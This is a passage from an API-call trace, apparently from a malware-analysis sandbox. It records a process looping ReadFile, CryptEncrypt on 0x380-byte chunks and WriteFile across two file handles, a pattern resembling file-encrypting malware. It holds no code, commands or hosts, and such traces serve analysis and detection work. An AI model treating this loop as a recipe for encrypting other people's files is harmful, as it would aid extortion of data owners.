hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.055] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.056] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.056] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.056] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.056] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.056] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.056] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.056] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.056] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.056] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.056] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.056] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.056] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.056] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.056] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.056] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.057] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.057] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.057] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.057] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.057] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.057] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.057] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.057] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.057] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.057] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.057] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.057] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.057] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.057] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.057] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.058] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.058] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.058] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.058] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.058] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.058] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.058] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.058] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.058] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.058] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.058] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.058] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.058] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.058] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.058] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.059] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.059] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.059] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.059] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.059] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.059] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.059] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.059] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.059] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.059] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.059] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.059] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.059] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.059] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.060] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.060] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.060] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.060] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.060] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.060] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.060] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.060] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.060] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.060] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.060] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.060] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.060] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.060] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.061] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.061] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.061] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.061] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.061] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.061] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.061] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.061] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.061] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.061] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.061] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.061] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.061] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.061] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.062] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.062] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.062] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.062] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.062] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.062] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.062] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.062] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.062] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.062] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.062] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.062] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.062] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.062] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: 